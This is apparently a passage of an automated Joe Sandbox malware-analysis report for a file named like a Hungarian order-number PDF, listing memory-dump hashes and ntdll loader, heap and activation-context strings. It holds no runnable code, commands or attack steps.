                                              • Instruction Fuzzy Hash: D090023130548C82D54071585804A46006547D0316F59D012A4065654D96258E59BA61
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ca912b01a84eb08a307871314922e9de9d7d41812cb28ceac74dbf87b5a9994
                                              • Instruction ID: a86f71d08dd6873fa5c67fffa3396eccf7a7cae20121b51c937c5c63aded4c43
                                              • Opcode Fuzzy Hash: 4ca912b01a84eb08a307871314922e9de9d7d41812cb28ceac74dbf87b5a9994
                                              • Instruction Fuzzy Hash: 7390023130144C42D50471585C04686005547D0312F59D012AA025615E966589957531
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be059a0030617ed56161e6eda8cba94cbbc78675d76f4566f66a2760af3ef665
                                              • Instruction ID: 5810244ad282152b416d63b31f7ea8c4b37149a74a424646fc5ef53f9188f63f
                                              • Opcode Fuzzy Hash: be059a0030617ed56161e6eda8cba94cbbc78675d76f4566f66a2760af3ef665
                                              • Instruction Fuzzy Hash: 4A90023170544C42D55071585814746005547D0312F59D012A4025614D87558B597AA1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76c639102fb9b0f58c053b18514047ce9de9f0155d4ade7c7ba066c8bfa0098f
                                              • Instruction ID: aaae19fdfae011f6a1fcf2fb47802fb5eef42a05e5d6b1b907c7cb5cabfbc935
                                              • Opcode Fuzzy Hash: 76c639102fb9b0f58c053b18514047ce9de9f0155d4ade7c7ba066c8bfa0098f
                                              • Instruction Fuzzy Hash: 00900435311444434505F55C1F0450700D747D537335DD033F5017510CD731CD755531
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e25482fc6e9c86a41a904fb8420caf53bd520727437023a5438fc559ab6c7d4a
                                              • Instruction ID: b7df72508f1b55415c066486cd152565fb23504fc842681245b1b01fbd63a6c0
                                              • Opcode Fuzzy Hash: e25482fc6e9c86a41a904fb8420caf53bd520727437023a5438fc559ab6c7d4a
                                              • Instruction Fuzzy Hash: 96900225321444424545B5581A0450B049557D6362399D016F5417550CC62189695721
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 249352c2c117d50913d05930c94d0aa42434f1c5085e047929494e2c1075828f
                                              • Instruction ID: a8234ce05a5a8a08da26bdaeb6575abaf96c2a886895937446333eb2eda58857
                                              • Opcode Fuzzy Hash: 249352c2c117d50913d05930c94d0aa42434f1c5085e047929494e2c1075828f
                                              • Instruction Fuzzy Hash: 889002A1301584D28900B2589804B0A455547E0212B59D017E5055520CC52589559535
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 86a84860205ef151705fa03bb58020a62036014fd11fc082744477536f1611f4
                                              • Instruction ID: dec48f00c146125f0104bba360b3a270204ac81d5138cec89fdd405f0af72ba9
                                              • Opcode Fuzzy Hash: 86a84860205ef151705fa03bb58020a62036014fd11fc082744477536f1611f4
                                              • Instruction Fuzzy Hash: 8C900471311444C3D504715C5C0470700D547F1313F5DD013F7155514CC53DCD755535
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5ff4013d50be0075b43a9dd048bbbe7050429de9c605126dd2986af8e818cb8
                                              • Instruction ID: 6c85c04ec644f324ec64c712dfb78bccf864cf1245163fa25977073ab9ac743e
                                              • Opcode Fuzzy Hash: b5ff4013d50be0075b43a9dd048bbbe7050429de9c605126dd2986af8e818cb8
                                              • Instruction Fuzzy Hash: 4390026134144882D50071585814B06005587E1312F59D016E5065514D8619CD566526
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e6fdc82f6e17295560725f0e805ed57012552b73922b762f4fa8ba20876c603
                                              • Instruction ID: 85326dd4e5f04ddbdebe027c398b8c757135b0b87919ebff5b090145d9996b7c
                                              • Opcode Fuzzy Hash: 0e6fdc82f6e17295560725f0e805ed57012552b73922b762f4fa8ba20876c603
                                              • Instruction Fuzzy Hash: CF900221311C4482D60075685C14B07005547D0313F59D116A4155514CC91589655921
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 784d9ed30c61479737d3ce66a27cd7bf8042e65101decba21d9681cd3b55aecd
                                              • Instruction ID: 70dacbe5b482cbb01c4fb7fc65549864296e16244c9b98dda79fec0d51861ab8
                                              • Opcode Fuzzy Hash: 784d9ed30c61479737d3ce66a27cd7bf8042e65101decba21d9681cd3b55aecd
                                              • Instruction Fuzzy Hash: 6690023130184842D50071585C1470B005547D0313F59D012A5165515D862589556971
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87e80731e8da4c2a24f435609a20d65a1f1ec76ebcef9efe98cee7870f66df3d
                                              • Instruction ID: bdd17923e9f6cab5c7800ac90692fb3200e6372f96763a207f4848f3e4eeb2fe
                                              • Opcode Fuzzy Hash: 87e80731e8da4c2a24f435609a20d65a1f1ec76ebcef9efe98cee7870f66df3d
                                              • Instruction Fuzzy Hash: D690022170144482854071689C4490640556BE1222759D122A4999510D855989695A65
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a7afcb7af341f00162d3d885ee94b6062277fe8e0f04a0cb7ecb3abd159ca44f
                                              • Instruction ID: 0bfe4f3fb28841338d9d8ba5b9e26fa43763f24a691e552a67a71a6234b04abf
                                              • Opcode Fuzzy Hash: a7afcb7af341f00162d3d885ee94b6062277fe8e0f04a0cb7ecb3abd159ca44f
                                              • Instruction Fuzzy Hash: 6D90023130184842D50071585C08747005547D0313F59D012A9165515E8665C9956931
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f21fa0c9529f996de974503ed5fad08fb8a79c65db7c9685485e8bc1c9e890a
                                              • Instruction ID: 4e2c394cf06e36e6b4bc4892cb242ac968d25970065edd6522e5ebcc089c7544
                                              • Opcode Fuzzy Hash: 9f21fa0c9529f996de974503ed5fad08fb8a79c65db7c9685485e8bc1c9e890a
                                              • Instruction Fuzzy Hash: 3A90022130144842D50271585814606005987D1356F99D013E5425515D86258A57A532
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 09f2a01b70da45e42e417c6228a0c3fbe29c7f1df968a8f99668fab8b321dcc4
                                              • Instruction ID: a8c7574abefe6f483de2fd733b8909a953d56cb42c496935c48b25091ca5e5a1
                                              • Opcode Fuzzy Hash: 09f2a01b70da45e42e417c6228a0c3fbe29c7f1df968a8f99668fab8b321dcc4
                                              • Instruction Fuzzy Hash: 2D90026130184843D54075585C04607005547D0313F59D012A6065515E8A298D556535
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c41e0619c255fa23716f5e670d7babfa830887e5f35db1be44222da2cce6ea76
                                              • Instruction ID: 370918bdc6c05b2b8354d7a6462c6dae6cace407a82fc3c5c3b7739e8061e5b9
                                              • Opcode Fuzzy Hash: c41e0619c255fa23716f5e670d7babfa830887e5f35db1be44222da2cce6ea76
                                              • Instruction Fuzzy Hash: DA90022170144942D50171585804616005A47D0252F99D023A5025515ECA258A96A531
                                              Memory Dump Source

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 91e20bf8aa023d0aebdcb56f6ab68489b523d640992387bf9a7b328f012d5e27
                                              • Instruction ID: f74d896f10762f993e31a0f6cfe9649f13669c705275a8005063d6902e478ee9
                                              • Opcode Fuzzy Hash: 91e20bf8aa023d0aebdcb56f6ab68489b523d640992387bf9a7b328f012d5e27
                                              • Instruction Fuzzy Hash: 7B5116B6A04316BFDB11CF9CE98097EF7B8BB48240B548669F4A4D3641D734DE509BE0

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 18b9397ffa0d406dc14beca0711b625f89f9c4f87b39c4624b260e939bf61033
                                              • Instruction ID: 296e51d2b4f8188ddcda3c1f18efa50715ac37120df2c95244109dfd03da7616
                                              • Opcode Fuzzy Hash: 18b9397ffa0d406dc14beca0711b625f89f9c4f87b39c4624b260e939bf61033
                                              • Instruction Fuzzy Hash: CC5125B5E00745AEEB20CF9CC98097FB7FDEB44240B44846AE4D7C3685EB74EA509B60

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: HEAP:
                                              • API String ID: 3446177414-2466845122
                                              • Opcode ID: 35c057acb83b781177725337d45f6bbc8bdae66d0612b7a2820c0860d00b5171
                                              • Instruction ID: fcb5ea2496d9a6e57a20b4b9cb252f58577bf35a301c1afe37a8207c04f30bfe
                                              • Opcode Fuzzy Hash: 35c057acb83b781177725337d45f6bbc8bdae66d0612b7a2820c0860d00b5171
                                              • Instruction Fuzzy Hash: D1A1AB75A153128FD704CE28C894A1ABBE5FF89360F19456DE945EB360EB30EC06DB92

                                              Control-flow Graph

                                              Strings
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 335D46FC
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 335D4742
                                              • Execute=1, xrefs: 335D4713
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 335D4655
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 335D4787
                                              • ExecuteOptions, xrefs: 335D46A0
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 335D4725
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              Strings
                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 335C79D5
                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 335C79D0, 335C79F5
                                              • Actx , xrefs: 335C7A0C, 335C7A73
                                              • SsHd, xrefs: 3357A3E4
                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 335C7AE6
                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 335C79FA
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                              • API String ID: 0-1988757188
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                              • API String ID: 3446177414-4227709934
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                              • API String ID: 3446177414-3492000579
                                              APIs
                                              Strings
                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 335B9AF6
                                              • LdrpLoadShimEngine, xrefs: 335B9ABB, 335B9AFC
                                              • minkernel\ntdll\ldrinit.c, xrefs: 335B9AC5, 335B9B06
                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 335B9AB4
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-3589223738
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: @3e3$LdrpUnloadNode$Unmapping DLL "%wZ"$dfe3@3e3@3e3$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 3446177414-1435353046
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$@
                                              • API String ID: 3446177414-1194432280
                                              APIs
                                              Strings
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 335D3640, 335D366C
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 335D365C
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 335D362F
                                              • LdrpFindDllActivationContext, xrefs: 335D3636, 335D3662
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 3446177414-3779518884
                                              Strings
                                              • TGS3, xrefs: 33582462
                                              • LdrpDynamicShimModule, xrefs: 335CA998
                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 335CA992
                                              • minkernel\ntdll\ldrinit.c, xrefs: 335CA9A2
                                              Similarity
                                              • API ID:
                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGS3$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-728310336
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$[$]:%u
                                              • API String ID: 48624451-2819853543
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3610490719
                                              APIs
                                              Strings
                                              • Failed to allocated memory for shimmed module list, xrefs: 335CA10F
                                              • LdrpCheckModule, xrefs: 335CA117
                                              • minkernel\ntdll\ldrinit.c, xrefs: 335CA121
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-161242083
                                              APIs
                                              Strings
                                              • Failed to reallocate the system dirs string !, xrefs: 335D82D7
                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 335D82DE
                                              • minkernel\ntdll\ldrinit.c, xrefs: 335D82E8
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1783798831
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 335D7BAC
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 335D7B7F
                                              • RTL: Resource at %p, xrefs: 335D7B8E
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 335D728C
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 335D72C1
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 335D7294
                                              • RTL: Resource at %p, xrefs: 335D72A3
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              • Opcode ID: ee3ef7eb0b9470256f08b5af8bc7146a0796d065d69d112b36b23ee4c34c5cc7
                                              • Instruction ID: 4d3f9f850739561e94d180e2065d398aabcf275c6a749beec96f04e1eb237ee3
                                              • Opcode Fuzzy Hash: ee3ef7eb0b9470256f08b5af8bc7146a0796d065d69d112b36b23ee4c34c5cc7
                                              • Instruction Fuzzy Hash: 12411135A00342AFE710CE28EC41F9AB7B6FF84750F540A19F998EB640DB31E8169BD1
                                              APIs
                                              Strings
                                              • LdrpCheckRedirection, xrefs: 335E488F
                                              • minkernel\ntdll\ldrredirect.c, xrefs: 335E4899
                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 335E4888
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                              • API String ID: 3446177414-3154609507
                                              • Opcode ID: ca036a109c738b62a77eaf9e8233719c599a443ae8b0491b59fcb05ca66077d6
                                              • Instruction ID: 67546c4fb51ed3aa83681de40a0aba438c8c84226cab3fa22c23d5ed8547ccbe
                                              • Opcode Fuzzy Hash: ca036a109c738b62a77eaf9e8233719c599a443ae8b0491b59fcb05ca66077d6
                                              • Instruction Fuzzy Hash: B841E2F6A093509FDB11CF28E840A967BE9AF8A792F060569EC94E7311D730DC81DBC1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
